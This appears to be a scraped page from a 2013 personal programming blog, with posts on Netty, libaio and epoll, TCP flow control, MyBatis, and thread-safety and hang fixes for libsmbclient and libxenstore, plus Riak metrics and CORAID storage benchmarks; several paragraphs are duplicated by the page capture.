In previous post Let's do our own full blown HTTP server with Netty 4 you and I were excited by creation of our own web server. So far so good. But how good?
Monday, December 30, 2013
Let's do our own full blown HTTP server with Netty 4
Sometimes servlets just doesn't fit you, sometimes you need to support some protocols except HTTP, sometimes you need something really fast. Allow me to show you the Netty that can suit for these needs.
First of all you need to understand what pipeline is, see Interface ChannelPipeline. Pipeline is like processing line where various ChannelHandlers convert input bytes into output. Pipeline corresponds one to one to connection, thus ChannelHandlers in our case will convert HTTP Request into HTTP Response, handlers will be responsible for such auxiliary things like parsing incoming packets and assembling outcoming and also call business logic to handle requests and produce responses.
Full source is available.
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. (http://netty.io/)Netty has everything one needs for HTTP, thus web server on Netty is like a low hanging fruit.
First of all you need to understand what pipeline is, see Interface ChannelPipeline. Pipeline is like processing line where various ChannelHandlers convert input bytes into output. Pipeline corresponds one to one to connection, thus ChannelHandlers in our case will convert HTTP Request into HTTP Response, handlers will be responsible for such auxiliary things like parsing incoming packets and assembling outcoming and also call business logic to handle requests and produce responses.
Full source is available.
Sunday, December 29, 2013
Python, scalable file uploading
Almost every solution suffers from dedicating a thread for particular client (like django) or despite having event loop on board sucking the whole file into the memory (like tornado). That makes impossible to handle either big amount of clients or big files. We also do not want to dedicate a file upload completely to some external entity while we want to make some auth checks before upload will be permitted (otherwise server can be flooded with unauthorized ingest traffic).
I've borrowed the idea below from Anatoly Mikhailov, see his post Nginx direct file upload without passing them through backend. Lets do this quickly.
I've borrowed the idea below from Anatoly Mikhailov, see his post Nginx direct file upload without passing them through backend. Lets do this quickly.
Thursday, December 26, 2013
Maintainable python code
The benefit of dynamically typed languages is the ease of writing the code but the cost of this is the problem with its understanding.
Such heavily typed languages as Haskell and Scala make use of comprehensive static type system and compiler that does all dirty job. At any given point of code one knows for sure that this particular variable is of this type and this function has such return type, etc. So basically one can understand what is going on. In python with its duck typing one can pass to function any object that adheres to some contract, this function can pass it further and further, add/remove some methods on the fly, etc., etc. So looking at some piece of code where you see variables and function applications one can barely understand it and lose track on what is going on. A static analyzer can help to some degree, see for instance PySonar, a Deep Static Analyzer for Python:
There is an example of dynamically typed language that doesn't suffer from code readability problem - Erlang. One always knows what comes in and what comes out (and as a result what is in each line of code). It doesn't have some comprehensive type system except records aka structs in C. But it has Function Specifications and dialyzer. Unlike python when you call the function in Erlang you pass not some object that has incapsulated state and exposed behavior but just plain data, the input data format is defined in function spec along with return data format. One doesn't need to pass behavior because it is incapsulated in some other lightweight process pid of which you may pass within the data. Because of such elegant/specific implementation of incapsulation and polymorphism Erlang solves problem with readability.
So, while pysonar is promising can one still do something easier and better? Unit tests? Good to have but covering each function is too much. Docstrings? Too informal. After a while I hit the article Making Wrong Code Look Wrong. I ended up with simple idea: name each variable/function in a way everybody understands what type it has/returns (the same for function args).
Simple example. Having following information aside
Such heavily typed languages as Haskell and Scala make use of comprehensive static type system and compiler that does all dirty job. At any given point of code one knows for sure that this particular variable is of this type and this function has such return type, etc. So basically one can understand what is going on. In python with its duck typing one can pass to function any object that adheres to some contract, this function can pass it further and further, add/remove some methods on the fly, etc., etc. So looking at some piece of code where you see variables and function applications one can barely understand it and lose track on what is going on. A static analyzer can help to some degree, see for instance PySonar, a Deep Static Analyzer for Python:
Treatment of Python’s dynamism. Static analysis for Python is hard because it has many dynamic features. They help make programs concise and flexible, but they also make automated reasoning about Python programs hard. Fortunately, some of these features can be reasonably handled. For example, function or class redefinition can be handled by inferring the effective scope of the old and new definitions. For code that are really undecidable, PySonar uses a universal honest answer: “I don’t know.” Well, not quite so. It attempts to report all known possibilities. For example, if a function is “conditionally defined” (e.g., defined differently in two branches of an if-statement) and the condition is undecidable, then PySonar gives it a union type which contains all possible types it can possibly have. By doing that, PySonar reduces false negative rates.Sidenote, Scala has duck typing via structural types but their usage in general is not recommended because implementation uses reflection that is slow. But indeed Scala structural typing is type safe in contrast to python, see Structural typing vs. Duck typing.
There is an example of dynamically typed language that doesn't suffer from code readability problem - Erlang. One always knows what comes in and what comes out (and as a result what is in each line of code). It doesn't have some comprehensive type system except records aka structs in C. But it has Function Specifications and dialyzer. Unlike python when you call the function in Erlang you pass not some object that has incapsulated state and exposed behavior but just plain data, the input data format is defined in function spec along with return data format. One doesn't need to pass behavior because it is incapsulated in some other lightweight process pid of which you may pass within the data. Because of such elegant/specific implementation of incapsulation and polymorphism Erlang solves problem with readability.
So, while pysonar is promising can one still do something easier and better? Unit tests? Good to have but covering each function is too much. Docstrings? Too informal. After a while I hit the article Making Wrong Code Look Wrong. I ended up with simple idea: name each variable/function in a way everybody understands what type it has/returns (the same for function args).
Simple example. Having following information aside
user variable has type model.User userid is a user id, has type intIt is easy to get idea what line below does indepedently on where in code you see it
user = user_by_userid(userid)If you present this information on variables/functions in some formal way, IDEs/static analyzers can also put warnings on variables that do not have such spec and on expressions/statements that just look wrong (see again article by Joel Spolsky), navigate to type definitions, show variable/function descriptions upon hovering, etc.
AIO with epoll event loop
In order to use libaio with epoll event loop use eventfd(2). With eventfd you create a descriptor and add it to epoll to observe and to libaio to notify when it has some events. Excerpt from source below
if ((afd = eventfd()) == -1) goto err_end; ... io_set_eventfd(&iocb, afd); ... ev.events = EPOLLIN | EPOLLET; ev.data.ptr = p; if (epoll_ctl(epollfd, EPOLL_CTL_ADD, afd, &ev) == -1) { log_syserr("epoll_ctl"); goto err_end; }Full source is available.
Pipelining and flow control
If you are about to create your own application level protocol on top of TCP to load your backend to its limit you should know about how to design such a protocol. Two things that go into mind immediately are pipelining and flow control.
Pipelining is what you have from the box if you are using stream based transport layer. For higher level protocols one needs not to throw it away, for instance, HTTP 1.1 supports pipelining. In brief this is to eliminate latency and jitter between client and server.
To see what flow control is take a look at Akka IO Write models. This gives an ability to the server to say don't push at me, slow down. Indeed TCP too implements ack based flow control.
How to use it? For instance, imagine you have a queue of tasks on server side that is filled by clients and processed by backend. In case clients send tasks too quick the length of the queue grows. One needs to introduce so named high watermark and low watermark. If queue length is greater than high watermark stop reading from sockets and queue length will decrease. When queue length becomes less than low watermark start reading tasks from sockets again.
Note, to make it possible for clients to adapt to speed you process tasks (actually to adapt window size) one shouldn't make a big gap between high and low watermarks. From the other side small gap means you'll be too often add/remove sockets from the event loop.
Some excerpt from real project that uses libev below
Pipelining is what you have from the box if you are using stream based transport layer. For higher level protocols one needs not to throw it away, for instance, HTTP 1.1 supports pipelining. In brief this is to eliminate latency and jitter between client and server.
To see what flow control is take a look at Akka IO Write models. This gives an ability to the server to say don't push at me, slow down. Indeed TCP too implements ack based flow control.
How to use it? For instance, imagine you have a queue of tasks on server side that is filled by clients and processed by backend. In case clients send tasks too quick the length of the queue grows. One needs to introduce so named high watermark and low watermark. If queue length is greater than high watermark stop reading from sockets and queue length will decrease. When queue length becomes less than low watermark start reading tasks from sockets again.
Note, to make it possible for clients to adapt to speed you process tasks (actually to adapt window size) one shouldn't make a big gap between high and low watermarks. From the other side small gap means you'll be too often add/remove sockets from the event loop.
Some excerpt from real project that uses libev below
//------------------------------------------------------------------ static request_s *request_new(connection_s *con) { request_s *new_request; new_request = alloc_data(request_mem_mng); if (!new_request) { log_err("cannot allocate memory"); goto err; } memset(new_request, 0, sizeof(request_s)); // Add to connection's list of requests list_add_tail(&new_request->request_list, &con->request_list); new_request->con = con; { // Flow control num_reqs++; if (num_reqs == REQUEST_HIGH_WATERMARK) { list_s *elt; connection_s *con; for (elt = connection_list.next; elt != &connection_list; elt = elt->next) { con = list_elt(elt, connection_s, connection_list); ev_io_stop(e_loop, &con->read_watcher); } } } return new_request; err: return NULL; } //------------------------------------------------------------------ static void request_del(request_s *req) { list_del(&req->request_list); list_del(&req->request_wait); if (req->data) free_data(data_mem_mng, req->data); free_data(request_mem_mng, req); { // Flow control num_reqs--; if (num_reqs == REQUEST_LOW_WATERMARK) { list_s *elt; connection_s *con; for (elt = connection_list.next; elt != &connection_list; elt = elt->next) { con = list_elt(elt, connection_s, connection_list); ev_io_start(e_loop, &con->read_watcher); } } } }Full source is available.
Why Scala
Pros
- Scala runs on jvm - the most mature and trusted vm, that is fast, really fast, on linux one can make use of mmapped files, epoll, AsynchronousChannel and other stuff. Take a look at Resin web server, it is fast as hell (by hell I mean nginx, resin has bigger memory footprint but can process requests as fast, but a part of resin is written in C though).
- Scala can reuse any java library (and they are many) and run in various java containers such as any Servlet/Web Profile container like Resin/Tomcat/Glassfish or even OSGi one.
- Scala absorbed almost every good thing from programming languages existed in past 40+ years (Lisp - 1958, ML - 1973, Haskell - 1990, Java - 1995). For those who loved Typeclasses in Haskell Scala has implicits that are effectively the same beast. And unlike academic languages such as Lisp and Haskell Scala has good practical focus.
- Scala has mature and proven Akka framework that is a copy of Erlang OTP - best thing for highly available and scalable applications. See Case Studies. You will love supervision trees, transparent from application perspective distribution of actors among nodes, declarative executors configuration, IO model, etc. Akka IPC is based on Netty that is one of the best Java IO frameworks that even implements its own buffer pool to not suffer from GC. Akka has also its own cluster implementation with the Gossip protocol on board.
- Scala has its own web frameworks like Play and Spray, both on top of Akka.
Cons
- Scala is a bit complex. Ideally one needs to have experience in Java (you'll be using jvm and java libs anyways), Haskell (to understand functional stuff), Erlang OTP (to properly use Actors and reactive programming).
- You can write application in java and start writing some parts in Scala that make it possible to transfer smoothly.
Wednesday, December 25, 2013
Good Transfer Object Hierarhy
One approach worked well for me. Allow me to show by example.
class UserTO { private Long id; ... public Long getId() { return id; } public void setId(Long id) { this.id = id; } ... } class UserHistoryTO { private Long id; ... public Long getId() { return id; } public void setId(Long id) { this.id = id; } ... } class UserDetailsTO extends UserTO { private List<UserHistoryTO> userHistory; ... public List<UserHistoryTO> getUserHistory() { return userHistory; } public void setUserHistory(List<UserHistoryTO> userHistory) { this.userHistory = userHistory; } ... }Do you see the point? Ok, whatever.
I'll go with MyBatis
You've worked hard and developed a bunch of persistence capable entities, data objects to hold projections, a good amount of JPQL/HQL NamedQueries, a few native SQL queries, optimistic locking is still perfect, you've put OpenEntityManagerInViewFilter because of some lazy things do not adhere to transaction demarcation and boundaries, and it works, it works just fine. Then you push it to production wait a month or so open The Slow Query Log, !#@! you think.
I'd advise against JPA/Hibernate especially when you do something highly scalable and highly available (see Sean Hull's 20 Biggest Bottlenecks That Reduce And Slow Down Scalability, Rule Number 9), especially when CQRS and Event Sourcing are a big deal. Ok, one may believe that doing programming with relational database without knowing how to write SQL and what execute plan will be used to run it is a good idea in case you protect yourself with Hibernate. But despite Hibernate abstracts RDB it doesn't remove complexity, take a look at Hibernate ORM documentation. And after all abstractions are leaky and you'll end up debugging SQL and writing native queries.
But you probably do not want to program in JDBC anymore. To make it convenient to work with DB and let DB do its stuff I'd use MyBatis that just removes boilerplate code and doesn't introduce some piece of magic. And yes, it is simple, see MyBatis3 Introduction.
To make you feel what it is like a really minimalistic example below. Mapper xml file src/main/resources/test/persistence/TestMapper.xml
I'd advise against JPA/Hibernate especially when you do something highly scalable and highly available (see Sean Hull's 20 Biggest Bottlenecks That Reduce And Slow Down Scalability, Rule Number 9), especially when CQRS and Event Sourcing are a big deal. Ok, one may believe that doing programming with relational database without knowing how to write SQL and what execute plan will be used to run it is a good idea in case you protect yourself with Hibernate. But despite Hibernate abstracts RDB it doesn't remove complexity, take a look at Hibernate ORM documentation. And after all abstractions are leaky and you'll end up debugging SQL and writing native queries.
But you probably do not want to program in JDBC anymore. To make it convenient to work with DB and let DB do its stuff I'd use MyBatis that just removes boilerplate code and doesn't introduce some piece of magic. And yes, it is simple, see MyBatis3 Introduction.
To make you feel what it is like a really minimalistic example below. Mapper xml file src/main/resources/test/persistence/TestMapper.xml
<?xml version="1.0" encoding="UTF-8"?> <!DOCTYPE mapper PUBLIC "-//mybatis.org//DTD Mapper 3.0//EN" "http://mybatis.org/dtd/mybatis-3-mapper.dtd"> <mapper namespace="test.persistence.TestMapper"> <select id="selectOne" parameterType="long" resultType="test"> SELECT t.id, t.name FROM test t WHERE t.id = #{id} </select> </mapper>Mapper interface src/main/java/test/persistence/TestMapper.java
package test.persistence; import test.model.Test; public interface TestMapper { Test selectOne(Long id); }Transfer object src/main/java/test/model/Test.java
package test.model; import java.io.Serializable; public class Test implements Serializable { private Long id; private String name; public Test() { super(); } public Long getId() { return id; } public void setId(Long id) { this.id = id; } public String getName() { return name; } public void setName(String name) { this.name = name; } }And a piece of code that make use of it
try (SqlSession session = sqlSessionFactory.openSession(TransactionIsolationLevel.REPEATABLE_READ)) { TestMapper mapper = session.getMapper(TestMapper.class); Test res = mapper.selectOne(1L); session.commit(); }So as you may guess the mapper interface is implemented by MyBatis with the help of provided mapper xml file. See MyBatis3 Getting started.
Tuesday, December 24, 2013
Java, ConcurrentSkipListMap
Why there is no ConcurrentTreeMap in java? Because trees are badly parallelized, but it is easy to implement lock-free skip list with the same cost O(log(n)).
If you have no memory but still want hash table
Ordinary hash table has practical limit on load factor below 75%. If you want more consider Cuckoo hashing, using just three hash functions increases the load to 91%.
libsmbclient3 and multithreading
If you want to use libsmbclient3 in process with many threads you are out of luck.
The first problem is talloc_stack.c in libsmbclient is not thread safe. Easy to fix
The first problem is talloc_stack.c in libsmbclient is not thread safe. Easy to fix
diff --git a/lib/util/talloc_stack.c b/lib/util/talloc_stack.c index 8e559cc..b88962b 100644 --- a/lib/util/talloc_stack.c +++ b/lib/util/talloc_stack.c @@ -39,6 +39,11 @@ #include "includes.h" + +#include <pthread.h> +static pthread_mutex_t mutex_lock = PTHREAD_MUTEX_INITIALIZER; + + struct talloc_stackframe { int talloc_stacksize; int talloc_stack_arraysize; @@ -82,7 +87,12 @@ static struct talloc_stackframe *talloc_stackframe_create(void) smb_panic("talloc_stackframe_init malloc failed"); } - SMB_THREAD_ONCE(&ts_initialized, talloc_stackframe_init, NULL); + SMB_THREAD_LOCK(&mutex_lock); + if (!ts_initialized) + talloc_stackframe_init(NULL); + ts_initialized = true; + SMB_THREAD_UNLOCK(&mutex_lock); + //SMB_THREAD_ONCE(&ts_initialized, talloc_stackframe_init, NULL); if (SMB_THREAD_SET_TLS(global_ts, ts)) { smb_panic("talloc_stackframe_init set_tls failed"); @@ -118,6 +128,7 @@ static int talloc_pop(TALLOC_CTX *frame) static TALLOC_CTX *talloc_stackframe_internal(size_t poolsize) { TALLOC_CTX **tmp, *top, *parent; + if (global_ts == NULL) talloc_stackframe_init(NULL); struct talloc_stackframe *ts = (struct talloc_stackframe *)SMB_THREAD_GET_TLS(global_ts);Second problem. Methods set_global_myname() and set_global_myworkgroup() in source3/lib/util_names.c are not thread safe too.
diff --git a/source3/lib/util_names.c b/source3/lib/util_names.c index bd6e5c1..1d8a96e 100644 --- a/source3/lib/util_names.c +++ b/source3/lib/util_names.c @@ -27,17 +27,24 @@ static char *smb_myname; static char *smb_myworkgroup; +#include <pthread.h> +static pthread_mutex_t mutex_lock = PTHREAD_MUTEX_INITIALIZER; + /*********************************************************************** Allocate and set myname. Ensure upper case. ***********************************************************************/ bool set_global_myname(const char *myname) { + SMB_THREAD_LOCK(&mutex_lock); SAFE_FREE(smb_myname); smb_myname = SMB_STRDUP(myname); - if (!smb_myname) + if (!smb_myname) { + SMB_THREAD_UNLOCK(&mutex_lock); return False; + } strupper_m(smb_myname); + SMB_THREAD_UNLOCK(&mutex_lock); return True; } @@ -52,11 +59,15 @@ const char *global_myname(void) bool set_global_myworkgroup(const char *myworkgroup) { + SMB_THREAD_LOCK(&mutex_lock); SAFE_FREE(smb_myworkgroup); smb_myworkgroup = SMB_STRDUP(myworkgroup); - if (!smb_myworkgroup) + if (!smb_myworkgroup) { + SMB_THREAD_UNLOCK(&mutex_lock); return False; + } strupper_m(smb_myworkgroup); + SMB_THREAD_UNLOCK(&mutex_lock); return True; }What you still need to know about libsmbclient3 and multithreading? Each context (SMBCCTX) must be used only by one thread at the same time. All resources (open files and directories) are bound to specific context and one cannot use it in another.
libxenstore bug
Opensource is perfect till you hit the critical bug. Then you are doomed. Ok, just joking. There is a community, in other words there are a lot of doomed people like you and bugs like this.
An example. There was (and probably is) a bug in Xen qemu-dm. It can just hang forever due to some circumstances. Some is a key word here. First time I've seen this in Xen Opensource 3.4.2. Taking into account that qemu-dm is responsible for all IO of some VM, this VM hangs too.
The problem was in libxenstore that called pthread_cond_wait():
Having said that the patch is obvious
An example. There was (and probably is) a bug in Xen qemu-dm. It can just hang forever due to some circumstances. Some is a key word here. First time I've seen this in Xen Opensource 3.4.2. Taking into account that qemu-dm is responsible for all IO of some VM, this VM hangs too.
The problem was in libxenstore that called pthread_cond_wait():
#define condvar_wait(c,m,hnd) pthread_cond_wait(c,m) mutex_lock(&h->watch_mutex); /* Wait on the condition variable for a watch to fire. */ while (list_empty(&h->watch_list)) condvar_wait(&h->watch_condvar, &h->watch_mutex, h); msg = list_top(&h->watch_list, struct xs_stored_msg, list); list_del(&msg->list); /* Clear the pipe token if there are no more pending watches. */ if (list_empty(&h->watch_list) && (h->watch_pipe[0] != -1)) while (read(h->watch_pipe[0], &c, 1) != 1) continue;watch_pipe is used for notifications (for select) about events in watch_list. Separate thread is writing to this pipe during element addition to this list in method read_message():
#define condvar_signal(c) pthread_cond_signal(c) mutex_lock(&h->watch_mutex); /* Kick users out of their select() loop. */ if (list_empty(&h->watch_list) && (h->watch_pipe[1] != -1)) while (write(h->watch_pipe[1], body, 1) != 1) continue; list_add_tail(&msg->list, &h->watch_list); condvar_signal(&h->watch_condvar); mutex_unlock(&h->watch_mutex);It looks ok but it is not. Sometimes select() reports a read readiness for watch_pipe[0] when watch_list is empty and pthread_cond_wait() hangs indefinitely. This is a big mistake. First of all, kernel can mistakenly give you false positives, second, even if your pipe contains something to read before you actually read from list some another thread can modify this list.
Having said that the patch is obvious
diff --git a/xen-3.4.2/tools/ioemu-qemu-xen/xenstore.c b/xen-3.4.2/tools/ioemu-qemu-xen/xenstore.c index 11b305d..894e9a5 100644 --- a/xen-3.4.2/tools/ioemu-qemu-xen/xenstore.c +++ b/xen-3.4.2/tools/ioemu-qemu-xen/xenstore.c @@ -953,7 +953,7 @@ void xenstore_process_event(void *opaque) char **vec, *offset, *bpath = NULL, *buf = NULL, *drv = NULL, *image = NULL; unsigned int len, num, hd_index; - vec = xs_read_watch(xsh, &num); + vec = xs_read_watch_noblock(xsh, &num); if (!vec) return; diff --git a/xen-3.4.2/tools/xenstore/xs.c b/xen-3.4.2/tools/xenstore/xs.c index 9707d19..9ce5be6 100644 --- a/xen-3.4.2/tools/xenstore/xs.c +++ b/xen-3.4.2/tools/xenstore/xs.c @@ -611,11 +611,11 @@ bool xs_watch(struct xs_handle *h, const char *path, const char *token) ARRAY_SIZE(iov), NULL)); } -/* Find out what node change was on (will block if nothing pending). +/* Find out what node change was on. * Returns array of two pointers: path and token, or NULL. * Call free() after use. */ -char **xs_read_watch(struct xs_handle *h, unsigned int *num) +static char **xs_read_watch_(struct xs_handle *h, unsigned int *num, bool block) { struct xs_stored_msg *msg; char **ret, *strings, c = 0; @@ -623,9 +623,19 @@ char **xs_read_watch(struct xs_handle *h, unsigned int *num) mutex_lock(&h->watch_mutex); - /* Wait on the condition variable for a watch to fire. */ - while (list_empty(&h->watch_list)) - condvar_wait(&h->watch_condvar, &h->watch_mutex, h); + if (block) { + /* Wait on the condition variable for a watch to fire. */ + while (list_empty(&h->watch_list)) + condvar_wait(&h->watch_condvar, &h->watch_mutex, h); + } + else if (list_empty(&h->watch_list)) { + /* Clear the pipe token if there are no more pending watches. */ + if (list_empty(&h->watch_list) && (h->watch_pipe[0] != -1)) + while (read(h->watch_pipe[0], &c, 1) != 1) + continue; + mutex_unlock(&h->watch_mutex); + return NULL; + } msg = list_top(&h->watch_list, struct xs_stored_msg, list); list_del(&msg->list); @@ -662,6 +672,15 @@ char **xs_read_watch(struct xs_handle *h, unsigned int *num) return ret; } +char **xs_read_watch(struct xs_handle *h, unsigned int *num) +{ + return xs_read_watch_(h, num, true); +} + +char **xs_read_watch_noblock(struct xs_handle *h, unsigned int *num) +{ + return xs_read_watch_(h, num, false); +} /* Remove a watch on a node. * Returns false on failure (no watch on that node). */ diff --git a/xen-3.4.2/tools/xenstore/xs.h b/xen-3.4.2/tools/xenstore/xs.h index bd36a0b..a921a40 100644 --- a/xen-3.4.2/tools/xenstore/xs.h +++ b/xen-3.4.2/tools/xenstore/xs.h @@ -109,6 +109,7 @@ int xs_fileno(struct xs_handle *h); * elements. Call free() after use. */ char **xs_read_watch(struct xs_handle *h, unsigned int *num); +char **xs_read_watch_noblock(struct xs_handle *h, unsigned int *num); /* Remove a watch on a node: implicitly acks any outstanding watch. * Returns false on failure (no watch on that node).
Get statistics from Riak
Riak uses folsom_metrics to gather stats. For instance, to obtain GET and PUT operations speed
erl -name tst -remsh dev1@127.0.0.1 -setcookie riak (dev1@127.0.0.1)1> folsom_metrics:get_histogram_statistics({riak_kv,node_get_fsm_time}). [{min,4717}, {max,8996}, {arithmetic_mean,7383.6}, {geometric_mean,7212.3111343349}, {harmonic_mean,7027.752380931542}, {median,7322}, {variance,2550850.2666666666}, {standard_deviation,1597.1381488984184}, {skewness,-0.4278090078808716}, {kurtosis,-1.5957932734122735}, {percentile,[{75,8726},{95,8996},{99,8996},{999,8996}]}, {histogram,[{7317,4},{10717,6},{12717,0}]}] (dev1@127.0.0.1)2> folsom_metrics:get_histogram_statistics({riak_kv,node_put_fsm_time}). [{min,6377}, {max,15908}, {arithmetic_mean,11016.857142857143}, {geometric_mean,10642.075761157581}, {harmonic_mean,10268.560398236386}, {median,10245}, {variance,8786965.516483517}, {standard_deviation,2964.281618956525}, {skewness,0.1986125638310398}, {kurtosis,-1.3191900349579302}, {percentile,[{75,14016},{95,14995},{99,15908},{999,15908}]}, {histogram,[{11377,9},{15377,4},{19377,1}]}]Note
- all values are in microseconds;
- stats are stored for last minute only;
- data is stored in memory (in ets tables), minimal impact on performance.
diff --git a/src/riak_kv_stat.erl b/src/riak_kv_stat.erl index 6cd5240..cf06de8 100644 --- a/src/riak_kv_stat.erl +++ b/src/riak_kv_stat.erl @@ -250,6 +250,8 @@ update1({get_fsm, Bucket, Microsecs, undefined, undefined, PerBucket}) -> folsom_metrics:notify_existing_metric({?APP, node_gets}, 1, spiral), folsom_metrics:notify_existing_metric({?APP, node_get_fsm_time}, Microsecs, histogram), do_get_bucket(PerBucket, {Bucket, Microsecs, undefined, undefined}); +update1({get_vnode, Microsecs}) -> + folsom_metrics:notify_existing_metric({?APP, vnode_get_time}, Microsecs, histogram); update1({get_fsm, Bucket, Microsecs, NumSiblings, ObjSize, PerBucket}) -> folsom_metrics:notify_existing_metric({?APP, node_gets}, 1, spiral), folsom_metrics:notify_existing_metric({?APP, node_get_fsm_time}, Microsecs, histogram), @@ -260,6 +262,8 @@ update1({put_fsm_time, Bucket, Microsecs, PerBucket}) -> folsom_metrics:notify_existing_metric({?APP, node_puts}, 1, spiral), folsom_metrics:notify_existing_metric({?APP, node_put_fsm_time}, Microsecs, histogram), do_put_bucket(PerBucket, {Bucket, Microsecs}); +update1({put_vnode, Microsecs}) -> + folsom_metrics:notify_existing_metric({?APP, vnode_put_time}, Microsecs, histogram); update1(read_repairs) -> folsom_metrics:notify_existing_metric({?APP, read_repairs}, 1, spiral); update1(coord_redir) -> @@ -370,8 +374,10 @@ stats() -> {node_get_fsm_siblings, histogram}, {node_get_fsm_objsize, histogram}, {node_get_fsm_time, histogram}, + {vnode_get_time, histogram}, {node_puts, spiral}, {node_put_fsm_time, histogram}, + {vnode_put_time, histogram}, {read_repairs, spiral}, {coord_redirs_total, counter}, {mapper_count, counter}, diff --git a/src/riak_kv_vnode.erl b/src/riak_kv_vnode.erl index 0c1d761..8482548 100644 --- a/src/riak_kv_vnode.erl +++ b/src/riak_kv_vnode.erl @@ -760,8 +760,12 @@ perform_put({true, Obj}, reqid=ReqID, index_specs=IndexSpecs}) -> Val = term_to_binary(Obj), + StartNow = now(), case Mod:put(Bucket, Key, IndexSpecs, Val, ModState) of {ok, UpdModState} -> + EndNow = now(), + Microsecs = timer:now_diff(EndNow, StartNow), + riak_kv_stat:update({put_vnode, Microsecs}), case RB of true -> Reply = {dw, Idx, Obj, ReqID}; @@ -866,7 +870,12 @@ do_get_term(BKey, Mod, ModState) -> end. do_get_binary({Bucket, Key}, Mod, ModState) -> - Mod:get(Bucket, Key, ModState). + StartNow = now(), + Res = Mod:get(Bucket, Key, ModState), + EndNow = now(), + Microsecs = timer:now_diff(EndNow, StartNow), + riak_kv_stat:update({get_vnode, Microsecs}), + Res. %% @private %% @doc This is a generic function for operations that involveAnd now
(dev1@127.0.0.1)1> folsom_metrics:get_histogram_statistics({riak_kv,vnode_get_time}). [{min,1516}, {max,5511}, {arithmetic_mean,3751.9}, {geometric_mean,3486.0111678580415}, {harmonic_mean,3190.229915515953}, {median,3892}, {variance,1879300.7666666668}, {standard_deviation,1370.8759122060126}, {skewness,-0.2710851221084366}, {kurtosis,-1.6493136210655186}, {percentile,[{75,4760},{95,5511},{99,5511},{999,5511}]}, {histogram,[{3816,4},{6516,6},{8516,0}]}] (dev1@127.0.0.1)2> folsom_metrics:get_histogram_statistics({riak_kv,vnode_put_time}). [{min,507}, {max,1776}, {arithmetic_mean,952.6428571428571}, {geometric_mean,818.2293396377823}, {harmonic_mean,722.2652885738648}, {median,561}, {variance,317468.09340659337}, {standard_deviation,563.4430702445397}, {skewness,0.5582974538827159}, {kurtosis,-1.7588827239013622}, {percentile,[{75,1615},{95,1759},{99,1776},{999,1776}]}, {histogram,[{1407,9},{2207,5},{3007,0}]}]Also note that with n_val=3 1 PUT for Riak equals to (1 GET + 1 PUT) * 3 nodes for leveldb/bitcask. And 1 GET for Riak equals to 1 GET * 3 nodes for leveldb/bitcask.
CORAID speed test
Hardware: 2x10Gb link, 36x2TB drives on CORAID SRX 4200.
reads = 163.39 iops/LUN, 2m49.834s/1000000 blocks
writes = 455.37 iops/LUN, 1m0.602s/1000000 blocks
reads = 1524.39 iops/LUN, 2m43.648s/1000000 blocks
writes = 164.47 iops/LUN, 2m31.699s/100000 blocks
reads = 1519.94 iops/LUN, 2m44.482s/1000000 blocks
writes = 555.55 iops/LUN, 0m44.665s/100000 blocks
See the test program. You need libaio for it (POSIX aio in librt uses pthreads which is not appropriate because of massive parallelism in our tests).
aoe-stat e0.X 2000.398GB eth2,eth3 8704 up (36 drives total) ethtool eth2 Speed: 10000Mb/s ethtool eth3 Speed: 10000Mb/s cec -s 0 eth2 disks 0.0 2000.398GB X.0.0 WDC WD2003FYYS-02W0B0 01.01D01 sata 3.0Gb/s (36 drives total) list -l X 2000.399GB online X.0 2000.399GB jbod normal X.0.0 normal 2000.399GB 0.X (36 JBODs total)CORAID raw device speed (using aio, O_DIRECT to omit the cache, O_SYNC and different RAID types):
- JBODs, 36 LUNs per 2TB, 4 simultaneous request/LUN, read and write by 4K blocks
reads = 163.39 iops/LUN, 2m49.834s/1000000 blocks
writes = 455.37 iops/LUN, 1m0.602s/1000000 blocks
- raid6rs, 4 LUNs per 14TB, 100 simultaneous request/LUN, read and write by 4K blocks
reads = 1524.39 iops/LUN, 2m43.648s/1000000 blocks
writes = 164.47 iops/LUN, 2m31.699s/100000 blocks
- raid5, 4 LUNs per 16TB, 100 simultaneous request/LUN, read and write by 4K blocks
reads = 1519.94 iops/LUN, 2m44.482s/1000000 blocks
writes = 555.55 iops/LUN, 0m44.665s/100000 blocks
See the test program. You need libaio for it (POSIX aio in librt uses pthreads which is not appropriate because of massive parallelism in our tests).
Xenstore for fun and profit
The XenStore is the configuration database in which Xen stores information on the running domUs. Although Xen uses the XenStore internally for vital matters like setting up virtual devices, you can also write arbitrary data to it from domUs as well as from dom0. Think of it as some sort of interdomain socket.I've stolen a useful script from The Book of Xen
#!/bin/sh function dumpkey() { local param=${1} local key local result result=$(xenstore-list ${param}) if [ "${result}" != "" ] ; then for key in ${result} ; do dumpkey ${param}/${key} ; done else echo -n ${param}'=' xenstore-read ${param} fi } for key in /vm /local/domain /tool ; do dumpkey ${key} ; doneLets do this
/vm/00000000-0000-0000-0000-000000000000/on_xend_stop=ignore /vm/00000000-0000-0000-0000-000000000000/shadow_memory=0 /vm/00000000-0000-0000-0000-000000000000/uuid=00000000-0000-0000-0000-000000000000 /vm/00000000-0000-0000-0000-000000000000/on_reboot=restart /vm/00000000-0000-0000-0000-000000000000/image/ostype=linux /vm/00000000-0000-0000-0000-000000000000/image/kernel= /vm/00000000-0000-0000-0000-000000000000/image/cmdline= /vm/00000000-0000-0000-0000-000000000000/image/ramdisk= /vm/00000000-0000-0000-0000-000000000000/on_poweroff=destroy /vm/00000000-0000-0000-0000-000000000000/bootloader_args= /vm/00000000-0000-0000-0000-000000000000/on_xend_start=ignore /vm/00000000-0000-0000-0000-000000000000/on_crash=restart /vm/00000000-0000-0000-0000-000000000000/xend/restart_count=0 /vm/00000000-0000-0000-0000-000000000000/vcpus=4 /vm/00000000-0000-0000-0000-000000000000/vcpu_avail=15 /vm/00000000-0000-0000-0000-000000000000/bootloader= /vm/00000000-0000-0000-0000-000000000000/name=Domain-0 /vm/00000000-0000-0000-0000-000000000000/memory=2796 /local/domain/0/vm=/vm/00000000-0000-0000-0000-000000000000 /local/domain/0/device= /local/domain/0/control/platform-feature-multiprocessor-suspend=1 /local/domain/0/error= /local/domain/0/memory/target=2863104 /local/domain/0/guest= /local/domain/0/hvmpv= /local/domain/0/cpu/1/availability=online /local/domain/0/cpu/3/availability=online /local/domain/0/cpu/2/availability=online /local/domain/0/cpu/0/availability=online /local/domain/0/name=Domain-0 /local/domain/0/console/limit=1048576 /local/domain/0/console/type=xenconsoled /local/domain/0/domid=0 /local/domain/0/device-model= /tool/xenstored=
Xenoprof, Xen profiling
